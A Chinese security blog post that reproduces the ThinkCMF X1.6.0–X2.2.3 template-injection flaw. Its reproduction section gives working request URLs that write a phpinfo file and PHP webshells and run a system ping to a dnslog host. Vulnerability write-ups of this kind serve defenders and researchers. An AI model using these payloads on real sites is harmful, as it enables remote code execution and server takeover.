thinkcmf文件包含x1.6.0-x2.2.3漏洞复现

最新推荐文章于 2024-09-13 21:45:01 发布
最新推荐文章于 2024-09-13 21:45:01 发布
阅读量1.2k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: php web安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/124682093
版权

所有文章,仅供安全研究与学习之用,后果自负!

thinkcmf文件包含x1.6.0-x2.2.3

thinkcmf文件包含x1.6.0-x2.2.3

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。

每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

0x01 漏洞描述

引起漏洞的最主要的问题是因为fetch函数和display函数是public类型。

fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。

display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。

fetch和display的用法差不多,二者的区别就是display方法直接输出模板文件渲染后的内容,而fetch方法是返回模板文件渲染后的内容。

0x02 影响范围

ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2

ThinkCMF X2.2.3

0x03 漏洞复现

3.0 包含readme

/?a=display&templateFile=README.md
在这里插入图片描述

3.1 phpinfo

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

在这里插入图片描述

在这里插入图片描述

3.2 webshell

/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('cmfshell.php','<?php @eval($_POST[123]); ?>')</php>

/?a=fetch&templateFile=public/index&prefix=''&content=<?php file_put_contents('shell.php','<?php $a="assert";$a($_POST[123]);?>');?>  //这个要POST传递参数123=phpinfo()

在这里插入图片描述
第二个连接失败

3.3 system

?a=fetch&content=<?php system('ping dnslog');?>

0x04 漏洞修复

升级版本

LuckyCharm~
关注
专栏目录
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1691
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
thinkcmf 文件包含 x1.6.0-x2.2.3
qq_23003811的博客
07-22 213
攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。1、漏洞验证,访问/test.php
ThinkCMF框架任意内容包含漏洞的讲解
最新发布
无问社区的博客
09-13 1186
本文来自无问社区,更多网安资料可前往查看ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。0x01 影响版本。
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 874
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
thinkcmf 文件包含 x1.6.0-x2.2.3 已亲自复现
qq_42430287的博客
12-27 831
ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2受害者IP:192.168.63.129:9390
ThinkCMF文件包含x1.6.0-x2.2.3
m0_65150886的博客
01-22 509
display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。fetch和display的用法差不多,二者的区别就是display方法直接输出模板文件渲染后的内容,而fetch方法是返回模板文件渲染后的内容。
onnxruntime-1.6.0-cp38-cp38-linux_armv7l.whl.zip
06-10
2. **onnxruntime-1.6.0-cp38-cp38-linux_armv7l.whl**:这是核心文件,包含了ONNX Runtime库的二进制代码,适用于Python 3.8版本,并且是为ARMv7架构的Linux系统优化的。 安装ONNX Runtime的步骤通常包括: 1. ...
tree-1.6.0-10.el7.x86_64.rpm
04-17
tree 命令英文理解为树的意思,其功能是是创建文件列表,将目录所有文件以树状的形式列出来。是一款在颜值上优先于ls的命令。本次上传的安装包适用于红帽7、centOS7 linux中的tree命令默认并不会安装, [root@...
spark-1.6.0-bin-hadoop2.4.tgz
12-16
在给定的压缩包文件"spark-1.6.0-bin-hadoop2.4.tgz"中,包含了Spark的1.6.0版本,该版本已经集成了与Hadoop 2.4版本的兼容性,使得用户可以在Hadoop环境下运行Spark应用。 Spark的核心组件包括: 1. **Spark Core*...
torch-1.6.0-cp36-cp36m-linux_aarch64.whl
08-04
官网提供了下载地址:https://forums.developer.nvidia.com/t/pytorch-for-jetson-nano-version-1-5-0-now-available/72048,我这边下载好上传到csdn。
PCL-1.6.0-AllInOne-msvc2010-win64.part1.rar
04-09
日常分享:pcl是功能强大的三维点云处理库,资源为1.6版本,可直接安装,自带64位debug/release动静态链接库和第三方库,适用于VS2010。
ThinkCMFX2.2.3_20161213.zip
01-23
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展,每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 ThinkCMFX 2.2.3 更新日志:2016-12-13 * 修复后台部分浏览器无法上传问题; * 优化chrome 上传文件时,打开文件选择框慢; * 修复后台文件添加编辑相册图片移除浏览器不兼容问题; * 修复文件上传在遨游下不能上传文件问题; * 修复后台登录错误时提示无样式。
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1785
【thinkcmf-文件包含】public函数
ThinkCMF X 2.2.3 SQL注入漏洞
Shen__Kong的博客
11-07 1135
漏洞2.3版本又以下,漏洞点与ArticleController.class.php edit_post方法SQL注入(CVE-2018-19898) 。 ThinkCMF X2.2.2是基于ThinkPHP 3.2.3开发的,ThinkPHP 3.x版本之前被爆出存在bind注入,这个漏洞就是ThinkPHP3.x注入的典型案例。漏洞位于前台文章编辑处,不过要复现这个漏洞点首先是要注册一个普...
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 912
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
Mac配置CMS审计环境:ThinkCMFv2.2.3
soldi_er的博客
07-26 549
文章目录搭建和配置CMS项目 搭建和配置CMS项目   访问开源社区gitee.com,搜索ThinkCMF,找到https://gitee.com/eded/thinkcmf?_from=gitee_search,下载ThinkCMF 2.2.3版本到本地。   对文件夹进行重命名,复制到Mac的Web目录,先直接访问thinkcmfv2.2.3/index.php,效果如图所示。 cp -r thinkcmf2.2.3 /Library/WebServer/Documents/thinkcmfv2.2
thinkcmf 渗透测试漏洞修复解决方案
网站安全资讯
11-20 1009
近段时间发现很多APP程序用的是thinkcmf,此程序源码存在getshell漏洞,我们Sine安全紧急对此高危漏洞进行了分析和漏洞修复,攻击者可以通过构造特定的请求包get请求即可在远程服务器上执行任意脚本代码。 根据index.php中的配置,项目路径为application,打开 P...
ThinkCMF框架使用笔记01-认识目录结构
doublewe的博客
12-28 853
1.首先我们看一下thinkcmf的根目录app文件夹部分: 这个app部分就是我们每次输入url时候,系统跳转位置,它会在我们输入的路径下去寻找对应的contrller控制器、方法,例如我们输入:localhost/demo/test/mytest,它就会去寻找他thinkcmf根目录下的app/demo/文件夹下的控制器testcontroller,并调用该控制下的mytest()方法。 2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值